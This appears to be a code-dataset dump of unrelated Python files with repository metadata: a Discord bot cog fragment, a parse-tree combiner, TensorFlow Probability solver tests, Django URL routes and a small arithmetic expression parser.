    @cmduserchannelconfig.command(name="information", aliases=["info"], usage="<true_or_false>")
    async def informationcmduserchannel(self, ctx: commands.Context, state: bool):
        """Enable or disable information message.

        Use `True` (Or `yes`) to enable or `False` (or `no`) to disable.
        """
        if not ctx.author.id == ctx.guild.owner.id:
            await ctx.send(_("Only the owner of this server can access these commands!").format(**locals()))
            return
        config = await self.config.guild(ctx.guild).all()
        actual_state_information = config["informationmessage_cmduserchannel"]
        if actual_state_information is state:
            await ctx.send(_("CommandUserChannel information message is already set on {state}.").format(**locals()))
            return
        await self.config.guild(ctx.guild).informationmessage_cmduserchannel.set(state)
        await ctx.send(_("CommandUserChannel information message state registered: {state}.").format(**locals()))
    async def member_can_run(self, ctx: commands.Context) -> bool:
        """Check if a user can run a command.

        This will take the current context into account, such as the
        server and text channel.
        https://github.com/Cog-Creators/Red-DiscordBot/blob/V3/release/3.0.0/redbot/cogs/permissions/permissions.py
        """
        # NOTE(review): str.replace strips the prefix anywhere in the message,
        # not only at the start — confirm this is intended.
        command = ctx.message.content.replace(ctx.prefix, "")
        com = ctx.bot.get_command(command)
        if com is None:
            return False
        else:
            try:
                # Re-evaluate the checks of the command and of each parent
                # group, outermost first; stop at the first failure.
                testcontext = await ctx.bot.get_context(ctx.message, cls=commands.Context)
                to_check = [*reversed(com.parents)] + [com]
                can = False
                for cmd in to_check:
                    can = await cmd.can_run(testcontext)
                    if can is False:
                        break
            except (commands.CheckFailure, commands.DisabledCommand):
                can = False
            return can
c0f4e2a773890721ecd880b703ffa0e4cc031d70 | 337 | py | Python | radical/radical.py | ndarwin314/symbolicPy | ce2e48bf1557b5995db6c324ada9fbd4767df1e3 | [
"MIT"
] | null | null | null | radical/radical.py | ndarwin314/symbolicPy | ce2e48bf1557b5995db6c324ada9fbd4767df1e3 | [
"MIT"
] | null | null | null | radical/radical.py | ndarwin314/symbolicPy | ce2e48bf1557b5995db6c324ada9fbd4767df1e3 | [
"MIT"
] | null | null | null | import numbers
class Radical(numbers.Real):
__slots__ = ("radicand", "degree")
def __init__(self, radicand, degree): # radicand ** (1/degree)
self.radicand = radicand
self.degree = degree
def __float__(self):
return pow(self.radicand, 1 / self.degree)
def __eq__(self, other):
| 22.466667 | 68 | 0.608309 |
e345c02900c0c413f4de04fa3bc399c4c309f06e | 5,493 | py | Python | src/demo/ai/solarix/DeSR/desr-1.3.2/script/treeCombine.py | name212/GrammarEngine | 1912809d6a19977c9d2fff88279b76a6152b659d | [
"MIT"
] | 55 | 2015-04-11T17:39:27.000Z | 2022-01-07T17:52:22.000Z | src/demo/ai/solarix/DeSR/desr-1.3.2/script/treeCombine.py | name212/GrammarEngine | 1912809d6a19977c9d2fff88279b76a6152b659d | [
"MIT"
] | 17 | 2017-11-22T13:31:11.000Z | 2021-06-06T08:30:43.000Z | src/demo/ai/solarix/DeSR/desr-1.3.2/script/treeCombine.py | qwazer/GrammarEngine | 08e1eb7bdfd77f29a51a7063848d74b9171291c4 | [
"MIT"
] | 28 | 2015-05-21T08:27:31.000Z | 2022-02-24T21:42:36.000Z | #!/usr/bin/env python
#----------------------------------------------------------------------
# Copyright (c) 2008 Giuseppe Attardi (attardi@di.unipi.it).
# Copyright (c) 2008 Felice Dell'Orletta (dellorle@di.unipi.it).
#----------------------------------------------------------------------
# Combines three parse trees (maximum spanning tree).
import sys
import re
# use binary mode to avoid adding \r
if sys.platform == "win32":
import os, msvcrt
msvcrt.setmode(sys.stdout.fileno(), os.O_BINARY)
debug = False #True
if len(sys.argv) < 7:
print 'usage:', sys.argv[0], ' file1 file2 file3 eval1 eval1 eval3'
print ' file1 file2 file3 are the output of three parsers'
print ' eval1 eval2 eval3 are their evaluations produced by eval07.pl'
print ' ORDER files by LAS.'
sys.exit()
class Sentence:
    """A parsed sentence: the token list plus derived tree links.

    Collects the tokens whose head is 0 into self.roots and appends every
    other token to its head's children list (heads are 1-based ids).
    """
    def __init__(self, tokens):
        self.tokens = tokens
        self.roots = []
        for tok in tokens:
            if tok.head == 0:
                self.roots.append(tok)
            else:
                tokens[tok.head - 1].children.append(tok)
    def __repr__(self):
        lines = [str(tok) for tok in self.tokens]
        return '\n'.join(lines)
class Token:
    """Represent a single token in a sentence (one CoNLL-X line).

    Fix: the class previously defined __init__ twice; the first (field-by-field)
    definition was dead code, silently shadowed by the second. Only the
    effective constructor is kept.
    """
    def __init__(self, items, weights):
        """Build a token from a CoNLL-X line split into fields.

        items: [id, form, lemma, cpostag, postag, feats, head, deprel, ...]
        weights: map from CPOS tag to the owning parser's accuracy percentage;
        the token's arc weight defaults to 0 for unseen tags.
        """
        self.id = int(items[0])
        self.word = items[1]
        self.lemma = items[2]
        self.cpos = items[3]
        self.pos = items[4]
        self.mfeats = items[5]
        self.head = int(items[6])
        self.dep = items[7]
        # Vote weight of this token's arc = parser accuracy for its CPOS.
        self.weight = weights.get(self.cpos, 0)
        self.children = []
    def __repr__(self):
        return '\t'.join([str(self.id), self.word, self.lemma, self.cpos, self.pos, self.mfeats, str(self.head), self.dep, str(self.weight)])
class ArcInfo:
    """An arc candidate held in the fringe: its accumulated vote weight
    and the dependent token the arc would attach."""
    def __init__(self, weight, tok):
        self.weight, self.tok = weight, tok
    def __repr__(self):
        return str(self.weight)
# Per-parser CPOS-accuracy maps (tag -> integer percentage), filled in by
# loadScores() from the three eval07.pl reports.
weight1 = {}
weight2 = {}
weight3 = {}
# Matches eval07.pl per-tag report lines: a tag token followed later on the
# line by an integer percentage, e.g. "NN ... 87%".
rel = re.compile(r'(\S+).*\s(\d+)%', re.I)
def loadScores(eval1, eval2, eval3):
    """Fill weight1/weight2/weight3 from three eval07.pl report files."""
    file1 = open(eval1)
    file2 = open(eval2)
    file3 = open(eval3)
    _scanScores(file1, weight1)
    _scanScores(file2, weight2)
    _scanScores(file3, weight3)
    file1.close()
    file2.close()
    file3.close()

def _scanScores(report, weights):
    """Scan one open eval07.pl report into *weights* (tag -> percentage).

    The per-tag table starts after a fixed 22-line header and ends at the
    first line that does not match the "<tag> ... <NN>%" pattern.
    """
    # skip the summary header of the report
    for n in range(0, 22):
        line = report.readline()
    match = rel.search(line)
    while match:
        weights[match.group(1)] = int(match.group(2))
        line = report.readline()
        match = rel.search(line)
def removeBest(fringe):
    """Pop the highest-weight arc from *fringe* and return its token.

    *fringe* maps arc keys to ArcInfo-like objects exposing ``.weight``
    and ``.tok``; it must be non-empty (guaranteed by the caller's loop).
    Ties keep the first arc encountered, as in the original scan.

    NOTE (from the original Italian comment): a weight-ordered structure
    would make this O(log n) instead of a linear scan.
    """
    # The original shadowed the builtin ``max`` with a local; use a
    # distinct name for the running maximum instead.
    best_weight = -1
    best_arc = None
    for arc, info in fringe.items():
        if best_weight < info.weight:
            best_weight = info.weight
            best_arc = arc
    tok = fringe[best_arc].tok
    del fringe[best_arc]
    return tok
def aggiungi(fringe, tok, tree):
    """Fix *tok* in *tree* and discard competing fringe arcs for its id.

    Once a token is added to the combined tree, any other fringe arc whose
    candidate is a *different* Token object with the same id must go.

    NOTE (from the original Italian comment): an auxiliary hashmap keyed
    by id would make the pruning constant-time instead of a full scan.
    """
    tree[tok.id - 1] = tok
    # Iterate over a snapshot of the keys: the original iterated
    # fringe.keys() while deleting, which is only safe under Python 2
    # (where keys() returns a list); under Python 3 it raises
    # RuntimeError.
    for key in list(fringe.keys()):
        candidate = fringe[key].tok
        if candidate.id == tok.id and candidate != tok:
            del fringe[key]
def expand(fringe, tok, tree):
    """Add to *fringe* every candidate arc leaving *tok*.

    Candidate children are gathered from all three parses; an arc proposed
    by more than one parser accumulates the parsers' weights.
    """
    idx = tok.id - 1
    for child in tokens1[idx].children + tokens2[idx].children + tokens3[idx].children:
        if (child.id - 1) in tree:
            continue  # already attached in the combined tree
        arc = (child.id, child.head, child.dep)
        if arc in fringe:
            fringe[arc].weight += child.weight
        else:
            fringe[arc] = ArcInfo(child.weight, child)
def combineTrees(roots):
    """Greedily build the combined tree from the parsers' root arcs.

    Maximum-spanning-tree style combination: starting from the candidate
    root arcs, repeatedly fix the highest-weight fringe arc into the tree
    and expand the fringe with the chosen token's children from all three
    parses.  Returns a dict mapping (token id - 1) -> Token.
    """
    tree = {} # the combined tree
    # fringe of the tree being built, contains arcs <id, head, dep>
    # with associated weight
    fringe = {}
    for root in roots:
        arc = (root.id, root.head, root.dep)
        if arc in fringe:
            # same root arc proposed by several parsers: accumulate weights
            fringe[arc].weight += root.weight
        else:
            fringe[arc] = ArcInfo(root.weight, root)
    while len(fringe) != 0:
        if debug:
            print fringe
        tok = removeBest(fringe)
        #tree[tok.id-1] = tok # add to tree
        aggiungi(fringe, tok, tree)
        expand(fringe, tok, tree)
    return tree
def combineFiles(file1, file2, file3):
    """Read three parallel CoNLL files and print the combined parse.

    The three files must contain the same sentences: one token per line,
    sentences separated by blank lines.  Reading is driven by file1: EOF
    on file1 ends processing (the other files are assumed parallel).
    Each sentence triple is combined with combineTrees() and written to
    stdout in CoNLL format.
    """
    global tokens1, tokens2, tokens3
    tokens1 = []
    tokens2 = []
    tokens3 = []
    sysFile1 = open(file1)
    sysFile2 = open(file2)
    sysFile3 = open(file3)
    while True:
        line1 = sysFile1.readline()
        line2 = sysFile2.readline()
        line3 = sysFile3.readline()
        if line1 == '':
            break
        if line1 == '\n':
            # End of sentence: combine the three parses and emit the tokens
            # of the merged tree, followed by a blank separator line.
            sent1 = Sentence(tokens1)
            sent2 = Sentence(tokens2)
            sent3 = Sentence(tokens3)
            roots = sent1.roots + sent2.roots + sent3.roots
            sentence = combineTrees(roots)
            for k in range(0, len(sentence)):
                print sentence[k]
            print
            tokens1 = []
            tokens2 = []
            tokens3 = []
            continue
        tokens1.append(Token(line1.split(), weight1))
        tokens2.append(Token(line2.split(), weight2))
        tokens3.append(Token(line3.split(), weight3))
# argv[4..6] are the eval07.pl reports (per-tag weights); argv[1..3] are the
# corresponding parser outputs, in the same order.
loadScores(sys.argv[4], sys.argv[5], sys.argv[6])
combineFiles(sys.argv[1], sys.argv[2], sys.argv[3])
| 26.795122 | 135 | 0.653923 |
f8f1a97e80a349acff0194aa5c73bf0eaef76d89 | 6,468 | py | Python | tensorflow_probability/python/math/ode/runge_kutta_util_test.py | brianwa84/probability | 6f8e78d859ac41170be5147c8c7bde54cc5aa83e | [
"Apache-2.0"
] | 2 | 2020-12-17T20:43:24.000Z | 2021-06-11T22:09:16.000Z | tensorflow_probability/python/math/ode/runge_kutta_util_test.py | brianwa84/probability | 6f8e78d859ac41170be5147c8c7bde54cc5aa83e | [
"Apache-2.0"
] | 2 | 2021-08-25T16:14:51.000Z | 2022-02-10T04:47:11.000Z | tensorflow_probability/python/math/ode/runge_kutta_util_test.py | brianwa84/probability | 6f8e78d859ac41170be5147c8c7bde54cc5aa83e | [
"Apache-2.0"
] | 1 | 2020-06-04T23:26:31.000Z | 2020-06-04T23:26:31.000Z | # Copyright 2018 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Tests for Runge-Kutta solver utils."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import parameterized
import numpy as np
import tensorflow.compat.v2 as tf
from tensorflow_probability.python.internal import test_util
from tensorflow_probability.python.math.ode import runge_kutta_util as rk_util
@test_util.test_all_tf_execution_regimes
@parameterized.named_parameters([
    ('float64', tf.float64),
    ('complex128', tf.complex128),
])
class RungeKuttaUtilTest(test_util.TestCase):
  """Tests for runge_kutta_util helpers; each test runs once per dtype above."""

  def test_polynomial_fit(self, dtype):
    """Asserts that interpolation of 4th order polynomial is exact."""
    coefficients = [1 + 2j, 0.3 - 1j, 3.5 - 3.7j, 0.5 - 0.1j, 0.1 + 0.1j]
    coefficients = [tf.cast(c, dtype) for c in coefficients]

    def f(x):
      # Polynomial with the coefficients above, highest degree first.
      components = []
      for power, c in enumerate(reversed(coefficients)):
        components.append(c * x**power)
      return tf.add_n(components)

    def f_prime(x):
      # Analytic derivative of f.
      components = []
      for power, c in enumerate(reversed(coefficients[:-1])):
        components.append(c * x**(power) * (power + 1))
      return tf.add_n(components)

    coeffs = rk_util._fourth_order_interpolation_coefficients(
        f(0.0), f(10.0), f(5.0), f_prime(0.0), f_prime(10.0), 10.0)
    # np.linspace default num=50 sample points on [0, 10].
    times = np.linspace(0, 10, dtype=np.float32)
    y_fit = tf.stack(
        [rk_util.evaluate_interpolation(coeffs, 0.0, 10.0, t) for t in times])
    y_expected = f(times)
    self.assertAllClose(y_fit, y_expected)

  def test_weighted_sum_tensor(self, dtype):
    del dtype  # not used in this test case.
    # Weights summing to zero on identical states give the zero tensor.
    weights = [0.5, -0.25, -0.25]
    states = [tf.eye(2) for _ in range(3)]
    weighted_tensor_sum = rk_util.weighted_sum(weights, states)
    self.assertAllClose(weighted_tensor_sum, tf.zeros((2, 2)))

    # Weights summing to one on all-ones states give all ones.
    weights = [0.5, -0.25, -0.25, 1.0]
    states = [tf.ones(2) for _ in range(4)]
    weighted_tensor_sum = rk_util.weighted_sum(weights, states)
    self.assertAllClose(weighted_tensor_sum, tf.ones(2))

    # A trailing zero weight must not perturb the result.
    weights = [0.5, -0.25, -0.25, 0.0]
    states = [tf.eye(2) for _ in range(4)]
    weighted_tensor_sum = rk_util.weighted_sum(weights, states)
    self.assertAllClose(weighted_tensor_sum, tf.zeros((2, 2)))

  def test_weighted_sum_nested_type(self, dtype):
    del dtype  # not used in this test case.
    # The structure (here a tuple) of the states must be preserved.
    weights = [0.5, -0.25, -0.25]
    states = [(tf.eye(2), tf.ones((2, 2))) for _ in range(3)]
    weighted_state_sum = rk_util.weighted_sum(weights, states)
    self.assertIsInstance(weighted_state_sum, tuple)

  def test_weighted_sum_nested_values(self, dtype):
    del dtype  # not used in this test case.
    weights = [0.5, -0.25, -0.25]
    states = [(tf.eye(2), tf.ones((2, 2))) for _ in range(3)]
    weighted_state_sum = rk_util.weighted_sum(weights, states)
    expected_result = (tf.zeros((2, 2)), tf.zeros((2, 2)))
    self.assertAllClose(weighted_state_sum, expected_result)

    # Zero weights contribute nothing, componentwise.
    weights = [0.5, -0.25, -0.25, 0]
    states = [(tf.eye(2), tf.ones((2, 2))) for _ in range(4)]
    weighted_state_sum = rk_util.weighted_sum(weights, states)
    expected_result = (tf.zeros((2, 2)), tf.zeros((2, 2)))
    self.assertAllClose(weighted_state_sum, expected_result)

  def test_weighted_sum_value_errors(self, dtype):
    del dtype  # not used in this test case.
    # Empty inputs are rejected.
    empty_weights = []
    empty_states = []
    with self.assertRaises(ValueError):
      _ = rk_util.weighted_sum(empty_weights, empty_states)
    # Mismatched weights/states lengths are rejected.
    wrong_length_weights = [0.5, -0.25, -0.25, 0]
    wrong_length_states = [(tf.eye(2), tf.ones((2, 2))) for _ in range(5)]
    with self.assertRaises(ValueError):
      _ = rk_util.weighted_sum(wrong_length_weights, wrong_length_states)
    # States with differing nested structures are rejected.
    weights = [0.5, -0.25, -0.25, 0]
    not_same_structure_states = [(tf.eye(2), tf.ones((2, 2))) for _ in range(3)]
    not_same_structure_states.append(tf.eye(2))
    with self.assertRaises(ValueError):
      _ = rk_util.weighted_sum(weights, not_same_structure_states)

  def test_abs_square(self, dtype):
    # abs_square(x) must agree with |x|**2.
    test_values = np.array([1 + 2j, 0.3 - 1j, 3.5 - 3.7j])
    input_values = tf.cast(test_values, dtype)
    actual_abs_square = rk_util.abs_square(input_values)
    expected_abs_square = tf.math.square(tf.abs(input_values))
    self.assertAllClose(actual_abs_square, expected_abs_square)

  def test_nest_rms_norm_on_tensor(self, dtype):
    # RMS norm of a tensor: ||x||_2 / sqrt(size).
    test_values = np.array([1.4 -1j, 2.7 + 0.23j, 7.3 + 9.4j])
    test_values = test_values.astype(dtype.as_numpy_dtype)
    input_values = tf.cast(test_values, dtype=dtype)
    actual_norm = rk_util.nest_rms_norm(input_values)
    expected_norm = np.linalg.norm(test_values) / np.sqrt(test_values.size)
    self.assertAllClose(actual_norm, expected_norm)

  def test_nest_rms_norm_on_nest(self, dtype):
    del dtype  # not used in this test case.
    # RMS norm over a nest equals the RMS norm of all elements flattened.
    a = np.array([1.4, 2.7, 7.3])
    b = 0.3 * np.eye(3, dtype=np.float32) + 0.64 * np.ones((3, 3))
    input_nest = (tf.convert_to_tensor(a), tf.convert_to_tensor(b))
    actual_norm_nest = rk_util.nest_rms_norm(input_nest)
    full_state = np.concatenate([np.expand_dims(a, 0), b])
    expected_norm_nest = np.linalg.norm(full_state) / np.sqrt(full_state.size)
    self.assertAllClose(expected_norm_nest, actual_norm_nest)

  def test_nest_constant(self, dtype):
    ndtype = dtype.as_numpy_dtype
    input_structure = (
        np.ones(4, dtype=ndtype),
        (np.eye(3, dtype=ndtype), np.zeros(4, dtype=ndtype))
    )
    # nest_constant defaults to filling the structure with ones; structure
    # must be preserved exactly.
    ones_like_structure = rk_util.nest_constant(input_structure)
    tf.nest.assert_same_structure(input_structure, ones_like_structure)
    flat_ones_like_structure = tf.nest.flatten(ones_like_structure)
    for component in flat_ones_like_structure:
      self.assertAllClose(component, tf.ones(shape=component.shape))
# Standard TensorFlow test entry point.
if __name__ == '__main__':
  tf.test.main()
| 41.197452 | 80 | 0.694496 |
52d266d9f22a23c4f4623c885f9c01b4c59ad836 | 1,227 | py | Python | api/urls.py | aaxelb/SHARE | 896e4f0c0e119436c0aaea364ea19389e7099d59 | [
"Apache-2.0"
] | 1 | 2019-10-12T20:51:06.000Z | 2019-10-12T20:51:06.000Z | api/urls.py | aaxelb/SHARE | 896e4f0c0e119436c0aaea364ea19389e7099d59 | [
"Apache-2.0"
] | 21 | 2020-06-01T13:59:32.000Z | 2021-08-01T06:20:29.000Z | api/urls.py | aaxelb/SHARE | 896e4f0c0e119436c0aaea364ea19389e7099d59 | [
"Apache-2.0"
] | null | null | null | from django.conf.urls import include
from django.conf.urls import url
from api import views
from api.base.views import RootView
# URL namespace: enables reversing as 'api:<name>' (e.g. 'api:status').
app_name = 'api'

# NOTE(review): django.conf.urls.url is deprecated since Django 2.0 and
# removed in 4.0 (re_path/path are the replacements) -- confirm the
# project's Django version before migrating.  Pattern order matters: the
# first matching regex wins.
urlpatterns = [
    url('^$', RootView.as_view()),
    # Resource routers, each mounted at the API root.
    url('^', include('api.banners.urls')),
    url('^', include('api.formattedmetadatarecords.urls')),
    url('^', include('api.ingestjobs.urls')),
    url('^', include('api.normalizeddata.urls')),
    url('^', include('api.rawdata.urls')),
    url('^', include('api.sourceregistrations.urls')),
    url('^', include('api.sourceconfigs.urls')),
    url('^', include('api.sources.urls')),
    url('^', include('api.suids.urls')),
    url('^', include('api.users.urls')),
    url('^schemas?/', include('api.schemas.urls'), name='schema'),
    url('^search/', include('api.search.urls'), name='search'),
    # TODO refactor non-viewset endpoints to conform to new structure
    url(r'^status/?', views.ServerStatusView.as_view(), name='status'),
    # Legacy feed endpoints kept for backwards compatibility.
    url(r'^rss/?', views.LegacyCreativeWorksRSS(), name='rss'),
    url(r'^atom/?', views.LegacyCreativeWorksAtom(), name='atom'),
    url(r'^feeds/rss/?', views.MetadataRecordsRSS(), name='feeds.rss'),
    url(r'^feeds/atom/?', views.MetadataRecordsAtom(), name='feeds.atom'),
]
| 36.088235 | 74 | 0.644662 |
3153714975fcab1c9e004bd1f6229ff6f08b8ae4 | 8,508 | py | Python | asdl/typed_arith_parse.py | rhencke/oil | c40004544e47ee78cde1fcb22c672162b8eb2cd2 | [
"Apache-2.0"
] | null | null | null | asdl/typed_arith_parse.py | rhencke/oil | c40004544e47ee78cde1fcb22c672162b8eb2cd2 | [
"Apache-2.0"
] | null | null | null | asdl/typed_arith_parse.py | rhencke/oil | c40004544e47ee78cde1fcb22c672162b8eb2cd2 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
"""
typed_arith_parse.py: Parse shell-like and C-like arithmetic.
"""
from __future__ import print_function
import sys
from _devbuild.gen.typed_arith_asdl import (
arith_expr, arith_expr_e, arith_expr_t,
arith_expr__Binary, arith_expr__FuncCall, arith_expr__Const)
from typing import Dict, List, Optional, Union, cast
from asdl import tdop
from asdl.tdop import Parser
from asdl.tdop import ParserSpec
# Local alias for the lexer's token type, used in type comments below.
Token = tdop.Token

#
# Null Denotation -- token that takes nothing on the left
#
def NullConstant(p,  # type: Parser
                 token,  # type: Token
                 bp,  # type: int
                 ):
  # type: (...) -> arith_expr_t
  """Nud for literals: a Const for numbers, a Var for bare names."""
  kind = token.type
  if kind == 'number':
    return arith_expr.Const(int(token.val))
  elif kind == 'name':
    # A string has to be wrapped in some kind of variant; names become Var.
    return arith_expr.Var(token.val)
  else:
    raise AssertionError(kind)
def NullParen(p,  # type: Parser
              token,  # type: Token
              bp,  # type: int
              ):
  # type: (...) -> arith_expr_t
  """Nud for '(' used as arithmetic grouping: parse the inner expression
  and require the closing ')'."""
  inner = p.ParseUntil(bp)
  p.Eat(')')
  return inner
def NullPrefixOp(p, token, bp):
  # type: (Parser, Token, int) -> arith_expr_t
  """Prefix operator.

  Low precedence: return, raise, etc.
    return x+y is return (x+y), not (return x) + y
  High precedence: logical negation, bitwise complement, etc.
    !x && y is (!x) && y, not !(x && y)
  """
  operand = p.ParseUntil(bp)
  return arith_expr.Unary(token.val, operand)
def NullIncDec(p, token, bp):
  # type: (Parser, Token, int) -> arith_expr_t
  """Prefix ++x or ++x[1]: the operand must be an l-value."""
  target = p.ParseUntil(bp)
  if not isinstance(target, (arith_expr.Var, arith_expr.Index)):
    raise tdop.ParseError("Can't assign to %r" % target)
  return arith_expr.Unary(token.val, target)
#
# Left Denotation -- token that takes an expression on the left
#
def LeftIncDec(p,  # type: Parser
               token,  # type: Token
               left,  # type: arith_expr_t
               rbp,  # type: int
               ):
  # type: (...) -> arith_expr_t
  """Led for postfix i++ and i--; the operand must be an l-value."""
  if not isinstance(left, (arith_expr.Var, arith_expr.Index)):
    raise tdop.ParseError("Can't assign to %r" % left)
  # Mark the token as the postfix variant so the node op is distinguishable
  # from the prefix form.
  token.type = 'post' + token.type
  return arith_expr.Unary(token.val, left)
def LeftIndex(p, token, left, unused_bp):
  # type: (Parser, Token, arith_expr_t, int) -> arith_expr_t
  """Led for '[': indexing f[x+1] or slicing f[a:b]."""
  # Only plain names can be indexed: f[x] or f[x][y].
  if not isinstance(left, arith_expr.Var):
    raise tdop.ParseError("%s can't be indexed" % left)
  index = p.ParseUntil(0)

  # Optional ':' introduces a slice end expression.
  end = None  # type: Union[arith_expr_t, None]
  if p.AtToken(':'):
    p.Next()
    end = p.ParseUntil(0)

  p.Eat(']')

  # TODO: also support a step, as in 1:4:2 (end and step both optional).
  if end:
    return arith_expr.Slice(left, index, end, None)
  return arith_expr.Index(left, index)
def LeftTernary(p,  # type: Parser
                token,  # type: Token
                left,  # type: arith_expr_t
                bp,  # type: int
                ):
  # type: (...) -> arith_expr_t
  """Led for '?': the C-style conditional, e.g. a > 1 ? x : y."""
  on_true = p.ParseUntil(bp)
  p.Eat(':')
  on_false = p.ParseUntil(bp)
  return arith_expr.Ternary(left, on_true, on_false)
def LeftBinaryOp(p,  # type: Parser
                 token,  # type: Token
                 left,  # type: arith_expr_t
                 rbp,  # type: int
                 ):
  # type: (...) -> arith_expr__Binary
  """Led for ordinary binary operators like 1+2 or 2*3."""
  right = p.ParseUntil(rbp)
  return arith_expr.Binary(token.val, left, right)
def LeftAssign(p,  # type: Parser
               token,  # type: Token
               left,  # type: arith_expr_t
               rbp,  # type: int
               ):
  # type: (...) -> arith_expr__Binary
  """Led for assignments: x = 1, x += 1, a[i] += 1."""
  # The target must be an l-value.
  if not isinstance(left, (arith_expr.Var, arith_expr.Index)):
    raise tdop.ParseError("Can't assign to %r" % left)
  node = arith_expr.Binary(token.val, left, p.ParseUntil(rbp))
  # For TESTING: attach fake span ids to the node.
  node.spids.extend([42, 43])
  return node
# Precedence used for ',' inside function-call argument lists, so commas
# separate arguments rather than acting as the C sequence operator.
COMMA_PREC = 1
def LeftFuncCall(p, token, left, unused_bp):
  # type: (Parser, Token, arith_expr_t, int) -> arith_expr__FuncCall
  """Led for '(': a function call f(a, b)."""
  # Only plain names are callable: f(x), not f[i](x).
  if not isinstance(left, arith_expr.Var):
    raise tdop.ParseError("%s can't be called" % left)
  args = []
  while not p.AtToken(')'):
    # Parse above COMMA_PREC so ',' acts as an argument separator here,
    # NOT as the sequence operator.
    args.append(p.ParseUntil(COMMA_PREC))
    if p.AtToken(','):
      p.Next()
  p.Eat(")")
  return arith_expr.FuncCall(left.name, args)
def MakeShellParserSpec():
  # type: () -> ParserSpec
  """Build the parser spec for shell-like and C-like arithmetic.

  Compare the table below with C operator precedence:
  http://en.cppreference.com/w/c/language/operator_precedence
  """
  parser_spec = tdop.ParserSpec()

  # Highest precedence: postfix ++/--, calls, indexing.
  parser_spec.Left(31, LeftIncDec, ['++', '--'])
  parser_spec.Left(31, LeftFuncCall, ['('])
  parser_spec.Left(31, LeftIndex, ['['])

  # 29 -- binds to everything except function call, indexing, postfix ops
  parser_spec.Null(29, NullIncDec, ['++', '--'])
  parser_spec.Null(29, NullPrefixOp, ['+', '!', '~', '-'])

  # Right associative: 2 ** 3 ** 2 == 2 ** (3 ** 2)
  parser_spec.LeftRightAssoc(27, LeftBinaryOp, ['**'])
  parser_spec.Left(25, LeftBinaryOp, ['*', '/', '%'])
  parser_spec.Left(23, LeftBinaryOp, ['+', '-'])
  parser_spec.Left(21, LeftBinaryOp, ['<<', '>>'])
  parser_spec.Left(19, LeftBinaryOp, ['<', '>', '<=', '>='])
  parser_spec.Left(17, LeftBinaryOp, ['!=', '=='])
  parser_spec.Left(15, LeftBinaryOp, ['&'])
  parser_spec.Left(13, LeftBinaryOp, ['^'])
  parser_spec.Left(11, LeftBinaryOp, ['|'])
  parser_spec.Left(9, LeftBinaryOp, ['&&'])
  parser_spec.Left(7, LeftBinaryOp, ['||'])

  parser_spec.LeftRightAssoc(5, LeftTernary, ['?'])

  # Right associative: a = b = 2 is a = (b = 2)
  parser_spec.LeftRightAssoc(3, LeftAssign, [
      '=',
      '+=', '-=', '*=', '/=', '%=',
      '<<=', '>>=', '&=', '^=', '|='])

  parser_spec.Left(COMMA_PREC, LeftBinaryOp, [','])

  # 0 precedence -- doesn't bind until )
  parser_spec.Null(0, NullParen, ['('])  # for grouping

  # -1 precedence -- never used
  parser_spec.Null(-1, NullConstant, ['name', 'number'])
  parser_spec.Null(-1, tdop.NullError, [')', ']', ':', 'eof'])

  return parser_spec
def MakeParser(s):
  # type: (str) -> Parser
  """Build a Parser over input string *s* (used by tests)."""
  return tdop.Parser(MakeShellParserSpec(), tdop.Tokenize(s))
def ParseShell(s, expected=None):
  # type: (str, Optional[str]) -> arith_expr_t
  """Parse *s*; optionally assert on the tree's s-expression repr.

  Used by tests.
  """
  tree = MakeParser(s).Parse()
  sexpr = repr(tree)
  if expected is not None:
    assert sexpr == expected, '%r != %r' % (sexpr, expected)
  return tree
class Evaluator(object):
  """Tiny demo evaluator over arith_expr trees.

  Eval() dispatches with isinstance(); Eval2() dispatches on the ASDL
  tag with explicit casts.  Unhandled nodes evaluate to the placeholder 3.
  """

  def __init__(self):
    # type: () -> None
    self.mem = {}  # type: Dict[str, int]

  def Eval(self, node):
    # type: (arith_expr_t) -> int
    """Evaluate using the isinstance() style for comparison."""
    if isinstance(node, arith_expr__Const):
      assert node.i is not None
      return node.i

    if isinstance(node, arith_expr__Binary):
      assert node.left is not None
      assert node.right is not None
      lhs = self.Eval(node.left)
      rhs = self.Eval(node.right)
      if node.op == '+':
        return lhs + rhs

    # Placeholder result for anything not handled above.
    return 3

  def Eval2(self, node):
    # type: (arith_expr_t) -> int
    """Evaluate by switching on the node's tag."""
    tag = node.tag
    if tag == arith_expr_e.Const:
      const_node = cast(arith_expr__Const, node)
      assert const_node.i is not None
      return const_node.i

    if tag == arith_expr_e.Binary:
      bin_node = cast(arith_expr__Binary, node)
      assert bin_node.left is not None
      assert bin_node.right is not None
      # Children are evaluated with Eval(), matching the original code.
      lhs = self.Eval(bin_node.left)
      rhs = self.Eval(bin_node.right)
      if bin_node.op == '+':
        return lhs + rhs

    return 3
def main(argv):
  # type: (List[str]) -> int
  """CLI entry point: parse or evaluate an arithmetic expression.

  Usage: arith_parse.py ACTION EXPRESSION, where ACTION is 'parse' or
  'eval'.  Returns a shell-style exit status (0 on success).
  """
  try:
    action = argv[1]
    s = argv[2]
  except IndexError:
    print('Usage: ./arith_parse.py ACTION EXPRESSION')
    return 2

  try:
    node = ParseShell(s)
  except tdop.ParseError as e:
    print('Error parsing %r: %s' % (s, e), file=sys.stderr)
    # BUG FIX: the original fell through here and then used the unbound
    # local 'node', raising NameError; fail cleanly instead.
    return 1

  if action == 'parse':
    print(node)
  elif action == 'eval':
    ev = Evaluator()
    result = ev.Eval(node)
    print(node)
    print(' => ')
    print(result)
  else:
    print('Invalid action %r' % action)
    return 2

  return 0
# Script entry point: exit with main()'s status code.
if __name__ == '__main__':
  sys.exit(main(sys.argv))
| 25.097345 | 78 | 0.58968 |
571fad8055a12302bbe2ff14fef7429820d7292c | 5,690 | py | Python | benchmarks/f3_wrong_hints/scaling_ltl_infinite_state/2-extending_bound_6.py | EnricoMagnago/F3 | c863215c318d7d5f258eb9be38c6962cf6863b52 | [
"MIT"
